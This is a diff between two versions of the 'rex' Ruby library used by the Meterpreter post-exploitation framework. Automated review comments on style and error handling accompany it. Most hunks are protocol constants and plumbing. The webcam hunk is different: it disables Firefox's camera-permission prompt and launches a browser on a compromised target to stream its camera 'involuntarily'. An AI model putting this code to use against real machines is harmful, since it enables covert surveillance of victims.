rex 2.0.8 → 2.0.9
- checksums.yaml +4 -4
- data/lib/rex.rb +1 -0
- data/lib/rex/arch.rb +5 -0
- data/lib/rex/arch/x86.rb +19 -5
- data/lib/rex/arch/zarch.rb +17 -0
- data/lib/rex/compat.rb +5 -4
- data/lib/rex/constants.rb +3 -1
- data/lib/rex/encoder/alpha2/alpha_mixed.rb +70 -9
- data/lib/rex/encoder/alpha2/alpha_upper.rb +67 -8
- data/lib/rex/exploitation/cmdstager.rb +1 -0
- data/lib/rex/exploitation/cmdstager/certutil.rb +115 -0
- data/lib/rex/exploitation/cmdstager/echo.rb +6 -3
- data/lib/rex/exploitation/egghunter.rb +1 -1
- data/lib/rex/google/geolocation.rb +68 -0
- data/lib/rex/io/bidirectional_pipe.rb +0 -4
- data/lib/rex/java/serialization.rb +2 -0
- data/lib/rex/java/serialization/decode_error.rb +11 -0
- data/lib/rex/java/serialization/encode_error.rb +11 -0
- data/lib/rex/java/serialization/model.rb +2 -0
- data/lib/rex/java/serialization/model/annotation.rb +3 -3
- data/lib/rex/java/serialization/model/block_data.rb +3 -3
- data/lib/rex/java/serialization/model/block_data_long.rb +3 -3
- data/lib/rex/java/serialization/model/class_desc.rb +6 -6
- data/lib/rex/java/serialization/model/contents.rb +17 -10
- data/lib/rex/java/serialization/model/field.rb +12 -11
- data/lib/rex/java/serialization/model/long_utf.rb +3 -3
- data/lib/rex/java/serialization/model/new_array.rb +22 -23
- data/lib/rex/java/serialization/model/new_class.rb +57 -0
- data/lib/rex/java/serialization/model/new_class_desc.rb +15 -16
- data/lib/rex/java/serialization/model/new_enum.rb +5 -5
- data/lib/rex/java/serialization/model/new_object.rb +22 -17
- data/lib/rex/java/serialization/model/proxy_class_desc.rb +109 -0
- data/lib/rex/java/serialization/model/reference.rb +4 -4
- data/lib/rex/java/serialization/model/stream.rb +7 -7
- data/lib/rex/java/serialization/model/utf.rb +3 -3
- data/lib/rex/json_hash_file.rb +94 -0
- data/lib/rex/logging/log_sink.rb +1 -0
- data/lib/rex/logging/sinks/timestamp_flatfile.rb +21 -0
- data/lib/rex/parser/appscan_nokogiri.rb +13 -23
- data/lib/rex/parser/fs/ntfs.rb +10 -5
- data/lib/rex/parser/nmap_nokogiri.rb +3 -1
- data/lib/rex/parser/openvas_nokogiri.rb +70 -73
- data/lib/rex/parser/winscp.rb +108 -0
- data/lib/rex/parser/x509_certificate.rb +92 -0
- data/lib/rex/payloads.rb +0 -1
- data/lib/rex/payloads/meterpreter/config.rb +154 -0
- data/lib/rex/payloads/meterpreter/uri_checksum.rb +136 -0
- data/lib/rex/post/meterpreter.rb +1 -1
- data/lib/rex/post/meterpreter/client.rb +26 -3
- data/lib/rex/post/meterpreter/client_core.rb +387 -75
- data/lib/rex/post/meterpreter/extensions/android/android.rb +127 -37
- data/lib/rex/post/meterpreter/extensions/android/tlv.rb +46 -25
- data/lib/rex/post/meterpreter/extensions/extapi/extapi.rb +4 -0
- data/lib/rex/post/meterpreter/extensions/extapi/ntds/ntds.rb +39 -0
- data/lib/rex/post/meterpreter/extensions/extapi/pageant/pageant.rb +44 -0
- data/lib/rex/post/meterpreter/extensions/extapi/tlv.rb +9 -0
- data/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb +16 -1
- data/lib/rex/post/meterpreter/extensions/priv/priv.rb +1 -1
- data/lib/rex/post/meterpreter/extensions/python/python.rb +114 -0
- data/lib/rex/post/meterpreter/extensions/python/tlv.rb +21 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb +17 -14
- data/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +33 -12
- data/lib/rex/post/meterpreter/extensions/stdapi/fs/mount.rb +57 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_kernel32.rb +3 -3
- data/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb +3 -1
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb +2 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb +16 -3
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb +29 -6
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb +5 -1
- data/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +18 -6
- data/lib/rex/post/meterpreter/extensions/stdapi/ui.rb +2 -2
- data/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb +34 -36
- data/lib/rex/post/meterpreter/packet.rb +29 -0
- data/lib/rex/post/meterpreter/packet_dispatcher.rb +20 -7
- data/lib/rex/post/meterpreter/ui/console.rb +1 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb +230 -72
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +544 -34
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/adsi.rb +188 -57
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb +115 -93
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/dhcp.rb +1 -1
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb +1 -1
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb +49 -15
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb +11 -2
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/python.rb +187 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb +324 -133
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb +52 -2
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +68 -65
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb +9 -1
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb +113 -118
- data/lib/rex/post/meterpreter/ui/console/interactive_channel.rb +3 -0
- data/lib/rex/powershell.rb +62 -0
- data/lib/rex/powershell/command.rb +359 -0
- data/lib/rex/{exploitation/powershell → powershell}/function.rb +0 -2
- data/lib/rex/{exploitation/powershell → powershell}/obfu.rb +0 -2
- data/lib/rex/{exploitation/powershell → powershell}/output.rb +11 -5
- data/lib/rex/{exploitation/powershell → powershell}/param.rb +0 -2
- data/lib/rex/powershell/parser.rb +182 -0
- data/lib/rex/powershell/payload.rb +78 -0
- data/lib/rex/{exploitation/powershell → powershell}/psh_methods.rb +16 -2
- data/lib/rex/{exploitation/powershell → powershell}/script.rb +2 -4
- data/lib/rex/proto/dcerpc/client.rb +6 -6
- data/lib/rex/proto/dcerpc/exceptions.rb +26 -0
- data/lib/rex/proto/http/client.rb +3 -3
- data/lib/rex/proto/http/client_request.rb +0 -5
- data/lib/rex/proto/http/response.rb +86 -0
- data/lib/rex/proto/ipmi/utils.rb +30 -26
- data/lib/rex/proto/kerberos/client.rb +1 -1
- data/lib/rex/proto/kerberos/model/kdc_request.rb +2 -2
- data/lib/rex/proto/rfb/client.rb +8 -3
- data/lib/rex/proto/rfb/constants.rb +1 -1
- data/lib/rex/proto/rmi.rb +2 -0
- data/lib/rex/proto/rmi/decode_error.rb +10 -0
- data/lib/rex/proto/rmi/exception.rb +10 -0
- data/lib/rex/proto/rmi/model.rb +5 -0
- data/lib/rex/proto/rmi/model/call.rb +4 -4
- data/lib/rex/proto/rmi/model/call_data.rb +137 -0
- data/lib/rex/proto/rmi/model/dgc_ack.rb +2 -2
- data/lib/rex/proto/rmi/model/element.rb +26 -11
- data/lib/rex/proto/rmi/model/output_header.rb +4 -4
- data/lib/rex/proto/rmi/model/ping.rb +2 -2
- data/lib/rex/proto/rmi/model/ping_ack.rb +2 -2
- data/lib/rex/proto/rmi/model/protocol_ack.rb +2 -2
- data/lib/rex/proto/rmi/model/return_data.rb +5 -5
- data/lib/rex/proto/rmi/model/return_value.rb +124 -0
- data/lib/rex/proto/rmi/model/unique_identifier.rb +77 -0
- data/lib/rex/proto/steam.rb +3 -0
- data/lib/rex/proto/steam/message.rb +125 -0
- data/lib/rex/proto/tftp/client.rb +35 -14
- data/lib/rex/random_identifier_generator.rb +2 -0
- data/lib/rex/ropbuilder.rb +1 -1
- data/lib/rex/socket/parameters.rb +9 -0
- data/lib/rex/socket/ssl_tcp.rb +25 -41
- data/lib/rex/socket/ssl_tcp_server.rb +10 -21
- data/lib/rex/sslscan/result.rb +20 -1
- data/lib/rex/text.rb +241 -55
- data/lib/rex/ui/output.rb +0 -3
- data/lib/rex/ui/subscriber.rb +0 -10
- data/lib/rex/ui/text/color.rb +9 -0
- data/lib/rex/ui/text/dispatcher_shell.rb +1 -0
- data/lib/rex/ui/text/output.rb +15 -4
- data/lib/rex/ui/text/output/file.rb +1 -0
- data/lib/rex/ui/text/output/stdio.rb +0 -16
- data/lib/rex/ui/text/shell.rb +3 -0
- data/lib/rex/ui/text/table.rb +85 -19
- data/lib/rex/user_agent.rb +118 -0
- data/rex.gemspec +2 -2
- metadata +41 -14
- data/lib/rex/exploitation/powershell.rb +0 -62
- data/lib/rex/exploitation/powershell/parser.rb +0 -183
- data/lib/rex/payloads/meterpreter.rb +0 -2
- data/lib/rex/payloads/meterpreter/patch.rb +0 -136
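--- a/data/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb
+++ b/data/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb
@@ -391,13 +391,26 @@ class ProcessList < Array
 cols.delete_if { |c| !( first.has_key?(c.downcase) ) or first[c.downcase].nil? }
 
 opts = {
-
-
+'Header' => 'Process List',
+'Indent' => 1,
+'Columns' => cols
 }.merge(opts)
 
 tbl = Rex::Ui::Text::Table.new(opts)
 each { |process|
-tbl << cols.map {|c|
+tbl << cols.map { |c|
+col = c.downcase
+val = process[col]
+if col == 'session'
+val == 0xFFFFFFFF ? '' : val.to_s
+elsif col == 'arch'
+# for display and consistency with payload naming we switch the internal
+# 'x86_64' value to display 'x64'
+val == ARCH_X86_64 ? 'x64' : val
+else
+val
+end
+}.compact
 }
 
 tbl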
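Review bot: The `.compact` closing the new `cols.map { |c| ... }` block drops a nil cell instead of rendering it, so the remaining values of that row shift one column to the left under the wrong header; the `delete_if` above only checks `first`, so a later process that lacks one of the kept keys would hit this. Returning a string for every column avoids it: change the `else` branch to `val.to_s` and drop `.compact`, which is what the `session` branch already does. The enclosing method starts outside the hunk.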
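--- a/data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb
+++ b/data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb
@@ -77,6 +77,22 @@ class Registry
 client, root_key, base_key, perm, response.get_tlv(TLV_TYPE_HKEY).value)
 end
 
+# Checks if a key exists on the target registry
+#
+# @param root_key [String] the root part of the key path. Ex: HKEY_LOCAL_MACHINE
+# @param base_key [String] the base part of the key path
+# @return [Boolean] true if the key exists on the target registry, false otherwise, even
+# it the session hasn't permissions to access the target key.
+# @raise [TimeoutError] if the timeout expires when waiting the answer
+# @raise [Rex::Post::Meterpreter::RequestError] if the parameters are not valid
+def Registry.check_key_exists(root_key, base_key)
+request = Packet.create_request('stdapi_registry_check_key_exists')
+request.add_tlv(TLV_TYPE_ROOT_KEY, root_key)
+request.add_tlv(TLV_TYPE_BASE_KEY, base_key)
+response = client.send_request(request)
+return response.get_tlv(TLV_TYPE_BOOL).value
+end
+
 #
 # Opens the supplied registry key on the specified remote host. Requires that the
 # current process has credentials to access the target and that the target has the
@@ -380,13 +396,20 @@ class Registry
 # Returns the integer value associated with the supplied registry value
 # type (like REG_SZ).
 #
+# @see https://msdn.microsoft.com/en-us/library/windows/desktop/ms724884(v=vs.85).aspx
+# @param type [String] A Windows registry type constant name, e.g. 'REG_SZ'
+# @return [Integer] one of the `REG_*` constants
 def self.type2str(type)
-
-
-
-
-
-
+case type
+when 'REG_BINARY' then REG_BINARY
+when 'REG_DWORD' then REG_DWORD
+when 'REG_EXPAND_SZ' then REG_EXPAND_SZ
+when 'REG_MULTI_SZ' then REG_MULTI_SZ
+when 'REG_NONE' then REG_NONE
+when 'REG_SZ' then REG_SZ
+else
+nil
+end
 end
 
 #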
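Review bot: `type2str` now returns nil for an unrecognised name, but the added `@return [Integer]` tag does not say so, and the name still reads as a type-to-string conversion while the body maps a string to a REG_* constant; suggest `# @return [Integer, nil] the REG_* constant named by type, or nil if the name is unknown`. In the `check_key_exists` doc block, "false otherwise, even it the session hasn't permissions" should read "even if the session has no permission", and the explicit `return` on its last line is redundant. `check_key_exists` is also declared as `def Registry.check_key_exists` while the neighbouring method uses `def self.type2str`; one form for both would be consistent.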
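--- a/data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb
+++ b/data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb
@@ -163,7 +163,11 @@ class RegistryKey
 # Returns the path to the key.
 #
 def to_s
-
+if self.base_key.nil?
+self.root_key.to_s + "\\"
+else
+self.root_key.to_s + "\\" + self.base_key
+end
 end
 
 #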
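Review bot: The new `to_s` body can be a single interpolation, because a nil `base_key` interpolates as an empty string: `"#{self.root_key}\\#{self.base_key}"` yields the same value in both branches and removes the duplicated `"\\"` literal. One difference to weigh: the `+` form raises TypeError if `base_key` is ever a non-String, whereas interpolation calls `to_s` on it; if that strictness is intended, keep the current shape but say so in the comment above the method.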
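--- a/data/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
+++ b/data/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
@@ -29,6 +29,16 @@ TLV_TYPE_FILE_NAME = TLV_META_TYPE_STRING | 1201
 TLV_TYPE_FILE_PATH = TLV_META_TYPE_STRING | 1202
 TLV_TYPE_FILE_MODE = TLV_META_TYPE_STRING | 1203
 TLV_TYPE_FILE_SIZE = TLV_META_TYPE_UINT | 1204
+TLV_TYPE_FILE_SHORT_NAME = TLV_META_TYPE_STRING | 1205
+TLV_TYPE_FILE_HASH = TLV_META_TYPE_RAW | 1206
+
+TLV_TYPE_MOUNT = TLV_META_TYPE_GROUP | 1207
+TLV_TYPE_MOUNT_NAME = TLV_META_TYPE_STRING | 1208
+TLV_TYPE_MOUNT_TYPE = TLV_META_TYPE_UINT | 1209
+TLV_TYPE_MOUNT_SPACE_USER = TLV_META_TYPE_QWORD | 1210
+TLV_TYPE_MOUNT_SPACE_TOTAL = TLV_META_TYPE_QWORD | 1211
+TLV_TYPE_MOUNT_SPACE_FREE = TLV_META_TYPE_QWORD | 1212
+TLV_TYPE_MOUNT_UNCPATH = TLV_META_TYPE_STRING | 1213
 
 TLV_TYPE_STAT_BUF = TLV_META_TYPE_COMPLEX | 1220
 
@@ -111,12 +121,14 @@ TLV_TYPE_VALUE_DATA = TLV_META_TYPE_RAW | 1012
 TLV_TYPE_TARGET_HOST = TLV_META_TYPE_STRING | 1013
 
 # Config
-TLV_TYPE_COMPUTER_NAME
-TLV_TYPE_OS_NAME
-TLV_TYPE_USER_NAME
-TLV_TYPE_ARCHITECTURE
-TLV_TYPE_LANG_SYSTEM
-TLV_TYPE_SID
+TLV_TYPE_COMPUTER_NAME = TLV_META_TYPE_STRING | 1040
+TLV_TYPE_OS_NAME = TLV_META_TYPE_STRING | 1041
+TLV_TYPE_USER_NAME = TLV_META_TYPE_STRING | 1042
+TLV_TYPE_ARCHITECTURE = TLV_META_TYPE_STRING | 1043
+TLV_TYPE_LANG_SYSTEM = TLV_META_TYPE_STRING | 1044
+TLV_TYPE_SID = TLV_META_TYPE_STRING | 1045
+TLV_TYPE_DOMAIN = TLV_META_TYPE_STRING | 1046
+TLV_TYPE_LOGGED_ON_USER_COUNT = TLV_META_TYPE_UINT | 1047
 
 # Environment
 TLV_TYPE_ENV_VARIABLE = TLV_META_TYPE_STRING | 1100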
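--- a/data/lib/rex/post/meterpreter/extensions/stdapi/ui.rb
+++ b/data/lib/rex/post/meterpreter/extensions/stdapi/ui.rb
@@ -157,7 +157,7 @@ class UI < Rex::Post::UI
 
 # include the x64 screenshot dll if the host OS is x64
 if( client.sys.config.sysinfo['Architecture'] =~ /^\S*x64\S*/ )
-screenshot_path =
+screenshot_path = MetasploitPayloads.meterpreter_path('screenshot','x64.dll')
 if screenshot_path.nil?
 raise RuntimeError, "screenshot.x64.dll not found", caller
 end
@@ -172,7 +172,7 @@ class UI < Rex::Post::UI
 end
 
 # but always include the x86 screenshot dll as we can use it for wow64 processes if we are on x64
-screenshot_path =
+screenshot_path = MetasploitPayloads.meterpreter_path('screenshot','x86.dll')
 if screenshot_path.nil?
 raise RuntimeError, "screenshot.x86.dll not found", caller
 end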
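Review bot: Both hunks repeat the same lookup-and-raise sequence for the x64 and x86 DLLs (new lines 160 and 175), so a small private helper taking the architecture suffix would leave a single place to maintain the lookup and the "not found" error. As written, the calls also read more easily with a space after the comma, `MetasploitPayloads.meterpreter_path('screenshot', 'x64.dll')`. The enclosing method starts and ends outside these hunks.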
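--- a/data/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
+++ b/data/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
@@ -1,7 +1,5 @@
 # -*- coding: binary -*-
 
-#require 'rex/post/meterpreter/extensions/process'
-
 module Rex
 module Post
 module Meterpreter
@@ -15,7 +13,6 @@ module Webcam
 #
 ###
 class Webcam
-
 include Msf::Post::Common
 include Msf::Post::File
 include Msf::Post::WebRTC
@@ -31,9 +28,9 @@ class Webcam
 def webcam_list
 response = client.send_request(Packet.create_request('webcam_list'))
 names = []
-response.get_tlvs(
+response.get_tlvs(TLV_TYPE_WEBCAM_NAME).each do |tlv|
 names << tlv.value
-
+end
 names
 end
 
@@ -49,11 +46,11 @@ class Webcam
 request = Packet.create_request('webcam_get_frame')
 request.add_tlv(TLV_TYPE_WEBCAM_QUALITY, quality)
 response = client.send_request(request)
-response.get_tlv(
+response.get_tlv(TLV_TYPE_WEBCAM_IMAGE).value
 end
 
 def webcam_stop
-client.send_request(
+client.send_request(Packet.create_request('webcam_stop'))
 true
 end
 
@@ -67,13 +64,13 @@ class Webcam
 offerer_id = Rex::Text.rand_text_alphanumeric(10)
 channel = Rex::Text.rand_text_alphanumeric(20)
 
-remote_browser_path =
+remote_browser_path = webrtc_browser_path
 
 if remote_browser_path.blank?
-
+fail "Unable to find a suitable browser on the target machine"
 end
 
-
+init_video_chat(remote_browser_path, server, channel, offerer_id)
 connect_video_chat(server, channel, offerer_id)
 end
 
@@ -83,40 +80,39 @@ class Webcam
 request = Packet.create_request('webcam_audio_record')
 request.add_tlv(TLV_TYPE_AUDIO_DURATION, duration)
 response = client.send_request(request)
-response.get_tlv(
+response.get_tlv(TLV_TYPE_AUDIO_DATA).value
 end
 
 attr_accessor :client
 
-
 private
 
-
 #
 # Returns a browser path that supports WebRTC
 #
 # @return [String]
 #
-def
+def webrtc_browser_path
 found_browser_path = ''
 
 case client.platform
 when /win/
 paths = [
-"
-"
+"%ProgramFiles(x86)%\\Google\\Chrome\\Application\\chrome.exe",
+"%ProgramFiles%\\Google\\Chrome\\Application\\chrome.exe",
+"%ProgramW6432%\\Google\\Chrome\\Application\\chrome.exe",
+"%ProgramFiles(x86)%\\Mozilla Firefox\\firefox.exe",
+"%ProgramFiles%\\Mozilla Firefox\\firefox.exe",
+"%ProgramW6432%\\Mozilla Firefox\\firefox.exe"
 ]
 
-drive = session.sys.config.getenv("SYSTEMDRIVE")
-paths = paths.map { |p| "#{drive}\\#{p}" }
-
 # Old chrome path
 user_profile = client.sys.config.getenv("USERPROFILE")
 paths << "#{user_profile}\\Local Settings\\Application Data\\Google\\Chrome\\Application\\chrome.exe"
 
 paths.each do |browser_path|
 if file?(browser_path)
-found_browser_path = browser_path
+found_browser_path = client.fs.file.expand_path(browser_path)
 break
 end
 end
@@ -124,7 +120,7 @@ class Webcam
 when /osx|bsd/
 [
 '/Applications/Google Chrome.app',
-'/Applications/Firefox.app'
+'/Applications/Firefox.app'
 ].each do |browser_path|
 if file?(browser_path)
 found_browser_path = browser_path
@@ -140,7 +136,6 @@ class Webcam
 found_browser_path
 end
 
-
 #
 # Creates a video chat session as an offerer... involuntarily :-p
 # Windows targets only.
@@ -161,9 +156,9 @@ class Webcam
 begin
 write_file("#{tmp_dir}\\interface.html", interface)
 write_file("#{tmp_dir}\\api.js", api)
-rescue
-elog("webcam_chat failed. #{e.class} #{e
-raise
+rescue RuntimeError => e
+elog("webcam_chat failed. #{e.class} #{e}")
+raise "Unable to initialize the interface on the target machine"
 end
 
 #
@@ -176,26 +171,29 @@ class Webcam
 profile_name = Rex::Text.rand_text_alpha(8)
 o = cmd_exec("#{remote_browser_path} --CreateProfile #{profile_name} #{tmp_dir}\\#{profile_name}")
 profile_path = (o.scan(/created profile '.+' at '(.+)'/).flatten[0] || '').strip
-setting =
+setting = %|user_pref("media.navigator.permission.disabled", true);|
 begin
 write_file(profile_path, setting)
-rescue
-elog("webcam_chat failed: #{e.class} #{e
-raise
+rescue RuntimeError => e
+elog("webcam_chat failed: #{e.class} #{e}")
+raise "Unable to write the necessary setting for Firefox."
 end
 args = "-p #{profile_name}"
 end
 
-exec_opts = {'Hidden' => false, 'Channelized' => false}
+exec_opts = { 'Hidden' => false, 'Channelized' => false }
 
 begin
 session.sys.process.execute(remote_browser_path, "#{args} #{tmp_dir}\\interface.html", exec_opts)
-rescue
-elog("webcam_chat failed. #{e.class} #{e
-raise
+rescue RuntimeError => e
+elog("webcam_chat failed. #{e.class} #{e}")
+raise "Unable to start the remote browser: #{e.message}"
 end
 end
-
 end
-
-end
+end
+end
+end
+end
+end
+end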
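Review bot: The three new `rescue RuntimeError => e` clauses in `init_video_chat` (the `@@ -161,9 +156,9 @@` and `@@ -176,26 +171,29 @@` hunks) only catch RuntimeError, so any other StandardError raised by `write_file`, `cmd_exec` or `session.sys.process.execute` — a Meterpreter RequestError, for instance, if that class does not derive from RuntimeError — skips the `elog` call and the user-facing message and propagates raw; `rescue StandardError => e` keeps the logging path for every failure while still re-raising with the friendlier text. In `webrtc_browser_path`, the Windows candidates are tested with `file?` in their unexpanded `%ProgramFiles%` form and only expanded after a hit, which presumably relies on the target-side stat expanding environment strings; a comment stating that assumption would help, since otherwise none of the six paths can match and only the USERPROFILE entry is ever found. `init_video_chat` starts outside the first of those hunks.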
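--- a/data/lib/rex/post/meterpreter/packet.rb
+++ b/data/lib/rex/post/meterpreter/packet.rb
@@ -87,6 +87,23 @@ TLV_TYPE_MIGRATE_BASE_ADDR = TLV_META_TYPE_UINT | 407
 TLV_TYPE_MIGRATE_ENTRY_POINT = TLV_META_TYPE_UINT | 408
 TLV_TYPE_MIGRATE_SOCKET_PATH = TLV_META_TYPE_STRING | 409
 
+
+TLV_TYPE_TRANS_TYPE = TLV_META_TYPE_UINT | 430
+TLV_TYPE_TRANS_URL = TLV_META_TYPE_STRING | 431
+TLV_TYPE_TRANS_UA = TLV_META_TYPE_STRING | 432
+TLV_TYPE_TRANS_COMM_TIMEOUT = TLV_META_TYPE_UINT | 433
+TLV_TYPE_TRANS_SESSION_EXP = TLV_META_TYPE_UINT | 434
+TLV_TYPE_TRANS_CERT_HASH = TLV_META_TYPE_RAW | 435
+TLV_TYPE_TRANS_PROXY_HOST = TLV_META_TYPE_STRING | 436
+TLV_TYPE_TRANS_PROXY_USER = TLV_META_TYPE_STRING | 437
+TLV_TYPE_TRANS_PROXY_PASS = TLV_META_TYPE_STRING | 438
+TLV_TYPE_TRANS_RETRY_TOTAL = TLV_META_TYPE_UINT | 439
+TLV_TYPE_TRANS_RETRY_WAIT = TLV_META_TYPE_UINT | 440
+TLV_TYPE_TRANS_GROUP = TLV_META_TYPE_GROUP | 441
+
+TLV_TYPE_MACHINE_ID = TLV_META_TYPE_STRING | 460
+TLV_TYPE_UUID = TLV_META_TYPE_RAW | 461
+
 TLV_TYPE_CIPHER_NAME = TLV_META_TYPE_STRING | 500
 TLV_TYPE_CIPHER_PARAMETERS = TLV_META_TYPE_GROUP | 501
 
@@ -179,6 +196,18 @@ class Tlv
 when TLV_TYPE_MIGRATE_LEN; "MIGRATE-LEN"
 when TLV_TYPE_MIGRATE_PAYLOAD; "MIGRATE-PAYLOAD"
 when TLV_TYPE_MIGRATE_ARCH; "MIGRATE-ARCH"
+when TLV_TYPE_TRANS_TYPE; "TRANS-TYPE"
+when TLV_TYPE_TRANS_URL; "TRANS-URL"
+when TLV_TYPE_TRANS_COMM_TIMEOUT; "TRANS-COMM-TIMEOUT"
+when TLV_TYPE_TRANS_SESSION_EXP; "TRANS-SESSION-EXP"
+when TLV_TYPE_TRANS_CERT_HASH; "TRANS-CERT-HASH"
+when TLV_TYPE_TRANS_PROXY_HOST; "TRANS-PROXY-HOST"
+when TLV_TYPE_TRANS_PROXY_USER; "TRANS-PROXY-USER"
+when TLV_TYPE_TRANS_PROXY_PASS; "TRANS-PROXY-PASS"
+when TLV_TYPE_TRANS_RETRY_TOTAL; "TRANS-RETRY-TOTAL"
+when TLV_TYPE_TRANS_RETRY_WAIT; "TRANS-RETRY-WAIT"
+when TLV_TYPE_MACHINE_ID; "MACHINE-ID"
+when TLV_TYPE_UUID; "UUID"
 
 #when Extensions::Stdapi::TLV_TYPE_NETWORK_INTERFACE; 'network-interface'
 #when Extensions::Stdapi::TLV_TYPE_IP; 'ip-address'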
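Review bot: The name table in `Tlv` gains entries for the new transport TLVs except `TLV_TYPE_TRANS_UA` and `TLV_TYPE_TRANS_GROUP`, so those two fall through to whatever the `case` default produces; adding `when TLV_TYPE_TRANS_UA; "TRANS-UA"` and `when TLV_TYPE_TRANS_GROUP; "TRANS-GROUP"` keeps the table complete. `TLV_TYPE_TRANS_PROXY_PASS` carries a credential, so whichever dump or inspect path prints these names alongside values should mask that one; the printing code is not in this hunk and is worth checking. The method containing the second hunk starts and ends outside it.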
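--- a/data/lib/rex/post/meterpreter/packet_dispatcher.rb
+++ b/data/lib/rex/post/meterpreter/packet_dispatcher.rb
@@ -66,9 +66,12 @@ module PacketDispatcher
 self.waiters = []
 self.alive = true
 
+# Ensure that there is only one leading and trailing slash on the URI
+resource_uri = "/" + self.conn_id.to_s.gsub(/(^\/|\/$)/, '') + "/"
+
 self.passive_service = self.passive_dispatcher
-self.passive_service.remove_resource(
-self.passive_service.add_resource(
+self.passive_service.remove_resource(resource_uri)
+self.passive_service.add_resource(resource_uri,
 'Proc' => Proc.new { |cli, req| on_passive_request(cli, req) },
 'VirtualDirectory' => true
 )
@@ -76,7 +79,16 @@ module PacketDispatcher
 
 def shutdown_passive_dispatcher
 return if not self.passive_service
-
+
+# Ensure that there is only one leading and trailing slash on the URI
+resource_uri = "/" + self.conn_id.to_s.gsub(/(^\/|\/$)/, '') + "/"
+
+self.passive_service.remove_resource(resource_uri)
+
+# If there are no more resources registered on the service, stop it entirely
+if self.passive_service.resources.empty?
+Rex::ServiceManager.stop_service(self.passive_service)
+end
 
 self.alive = false
 self.send_queue = []
@@ -94,6 +106,8 @@ module PacketDispatcher
 resp['Content-Type'] = 'application/octet-stream'
 resp['Connection'] = 'close'
 
+self.last_checkin = Time.now
+
 # If the first 4 bytes are "RECV", return the oldest packet from the outbound queue
 if req.body[0,4] == "RECV"
 rpkt = send_queue.shift
@@ -114,9 +128,6 @@ module PacketDispatcher
 cli.send_response(resp)
 end
 
-# Force a closure for older WinInet implementations
-self.passive_service.close_client( cli )
-
 rescue ::Exception => e
 elog("Exception handling request: #{cli.inspect} #{req.inspect} #{e.class} #{e} #{e.backtrace}")
 end
@@ -178,7 +189,6 @@ module PacketDispatcher
 # Sends a packet and waits for a timeout for the given time interval.
 #
 def send_request(packet, t = self.response_timeout)
-
 if not t
 send_packet(packet)
 return nil
@@ -490,6 +500,9 @@ module PacketDispatcher
 client = self
 end
 
+# Update our last reply time
+client.last_checkin = Time.now
+
 # If the packet is a response, try to notify any potential
 # waiters
 if ((resp = packet.response?))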
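Review bot: `resource_uri` is built with the same expression in both the `@@ -66,9 +66,12 @@` and `@@ -76,7 +79,16 @@` hunks, and that expression does not do what its comment says: the regex anchors with `^`/`$` and removes only one slash per end, so a `conn_id` such as `/abc//` still yields `//abc//`. A private helper used by both methods, `def passive_resource_uri; "/#{self.conn_id.to_s.gsub(%r{\A/+|/+\z}, '')}/"; end`, strips any run of slashes and keeps register and unregister on one definition. The method containing the first hunk starts outside it.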
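--- a/data/lib/rex/post/meterpreter/ui/console.rb
+++ b/data/lib/rex/post/meterpreter/ui/console.rb
@@ -83,6 +83,7 @@ class Console
 channel.extend(InteractiveChannel) unless (channel.kind_of?(InteractiveChannel) == true)
 channel.on_command_proc = self.on_command_proc if self.on_command_proc
 channel.on_print_proc = self.on_print_proc if self.on_print_proc
+channel.on_log_proc = method(:log_output) if self.respond_to?(:log_output, true)
 
 channel.interact(input, output)
 channel.reset_ui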